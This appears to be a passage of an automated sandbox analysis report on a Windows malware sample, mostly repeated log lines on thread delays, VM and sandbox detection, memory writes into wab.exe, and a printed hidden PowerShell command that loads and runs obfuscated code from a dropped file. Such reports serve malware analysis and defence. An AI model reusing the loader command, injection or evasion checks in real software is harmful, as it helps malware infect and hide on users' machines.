Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Check if machine is in data center or colocation facility

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: wab.exe, 00000005.00000002.2869316085.00000000205A5000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: A70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 20540000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 20450000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599889	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599325	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599108	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598985	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598871	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598734	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598608	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598473	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598325	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8362	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1430	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Window / User API: threadDelayed 2947	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Window / User API: threadDelayed 6868	Jump to behavior

Source: C:\Users\user\Desktop\hnTW5HdWvY.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll

Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7212	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692	Thread sleep time: -27670116110564310s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7696	Thread sleep count: 2947 > 30	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692	Thread sleep time: -599889s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7696	Thread sleep count: 6868 > 30	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692	Thread sleep time: -599671s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692	Thread sleep time: -599562s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692	Thread sleep time: -599437s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692	Thread sleep time: -599325s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692	Thread sleep time: -599218s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692	Thread sleep time: -599108s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692	Thread sleep time: -598985s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692	Thread sleep time: -598871s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692	Thread sleep time: -598734s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692	Thread sleep time: -598608s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692	Thread sleep time: -598473s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692	Thread sleep time: -598325s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692	Thread sleep time: -99875s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692	Thread sleep time: -99765s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692	Thread sleep time: -99656s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692	Thread sleep time: -99547s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692	Thread sleep time: -99437s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692	Thread sleep time: -99328s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692	Thread sleep time: -99218s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692	Thread sleep time: -99109s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692	Thread sleep time: -99000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692	Thread sleep time: -98890s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692	Thread sleep time: -98781s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692	Thread sleep time: -98672s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692	Thread sleep time: -98562s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692	Thread sleep time: -98453s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692	Thread sleep time: -98344s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692	Thread sleep time: -98234s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692	Thread sleep time: -98125s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692	Thread sleep time: -98015s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692	Thread sleep time: -97905s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692	Thread sleep time: -97785s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692	Thread sleep time: -97656s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692	Thread sleep time: -97547s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692	Thread sleep time: -97422s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692	Thread sleep time: -97312s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692	Thread sleep time: -97203s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692	Thread sleep time: -97093s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692	Thread sleep time: -96984s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692	Thread sleep time: -96875s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692	Thread sleep time: -96765s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692	Thread sleep time: -96656s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692	Thread sleep time: -96547s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692	Thread sleep time: -96422s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692	Thread sleep time: -96312s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692	Thread sleep time: -96203s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692	Thread sleep time: -96093s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692	Thread sleep time: -95984s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692	Thread sleep time: -95875s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692	Thread sleep time: -95763s >= -30000s	Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Program Files (x86)\Windows Mail\wab.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\hnTW5HdWvY.exe	Code function: 0_2_00402647 FindFirstFileA,	0_2_00402647
Source: C:\Users\user\Desktop\hnTW5HdWvY.exe	Code function: 0_2_00405E7E FindFirstFileA,FindClose,	0_2_00405E7E
Source: C:\Users\user\Desktop\hnTW5HdWvY.exe	Code function: 0_2_0040543A GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_0040543A

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599889	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599325	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599108	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598985	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598871	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598734	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598608	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598473	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598325	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99875	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99765	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99656	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99547	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99437	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99328	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99218	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99109	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98890	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98781	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98672	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98562	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98453	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98344	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98234	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98125	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98015	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 97905	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 97785	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 97656	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 97547	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 97422	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 97312	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 97203	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 97093	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 96984	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 96875	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 96765	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 96656	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 96547	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 96422	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 96312	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 96203	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 96093	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 95984	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 95875	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 95763	Jump to behavior

Source: C:\Users\user\Desktop\hnTW5HdWvY.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Desktop\hnTW5HdWvY.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\hnTW5HdWvY.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\Desktop\hnTW5HdWvY.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\hnTW5HdWvY.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts	Jump to behavior
Source: C:\Users\user\Desktop\hnTW5HdWvY.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Source: wab.exe, 00000005.00000002.2869316085.00000000205A5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware
Source: wab.exe, 00000005.00000002.2869316085.00000000205A5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: powershell.exe, 00000001.00000002.2015644677.0000000007281000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.2857526156.0000000000B7F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.2857526156.0000000000B17000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\hnTW5HdWvY.exe	API call chain: ExitProcess graph end node			graph_0-3240
Source: C:\Users\user\Desktop\hnTW5HdWvY.exe	API call chain: ExitProcess graph end node			graph_0-3394

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 1_2_02C9DAC0 LdrInitializeThunk,LdrInitializeThunk,

1_2_02C9DAC0

Source: C:\Users\user\Desktop\hnTW5HdWvY.exe

Code function: 0_2_00405EA5 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00405EA5

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 4220000			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: A7FEB0			Jump to behavior

Source: C:\Users\user\Desktop\hnTW5HdWvY.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Apologi133=Get-Content 'C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Bundforskelligt.For';$Equestrial=$Apologi133.SubString(19094,3);.$Equestrial($Apologi133)"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior

Source: C:\Users\user\Desktop\hnTW5HdWvY.exe

Code function: 0_2_100010D3 GetModuleFileNameA,GlobalAlloc,CharPrevA,GlobalFree,GetTempFileNameA,CopyFileA,CreateFileA,CreateFileMappingA,MapViewOfFile,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,lstrcatA,lstrlenA,GlobalAlloc,FindWindowExA,FindWindowExA,FindWindowExA,lstrcmpiA,DeleteFileA,GlobalAlloc,GlobalLock,GetVersionExA,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreatePipe,CreatePipe,CreatePipe,GetStartupInfoA,CreateProcessA,lstrcpyA,GetTickCount,PeekNamedPipe,GetTickCount,ReadFile,lstrlenA,lstrlenA,lstrlenA,lstrcpynA,lstrlenA,GlobalSize,GlobalUnlock,GlobalReAlloc,GlobalLock,lstrcatA,GlobalSize,lstrlenA,lstrcpyA,CharNextA,GetTickCount,TerminateProcess,lstrcpyA,Sleep,WaitForSingleObject,GetExitCodeProcess,PeekNamedPipe,lstrcpyA,lstrcpyA,wsprintfA,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,DeleteFileA,GlobalFree,GlobalFree,GlobalUnlock,GlobalFree,

0_2_100010D3

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
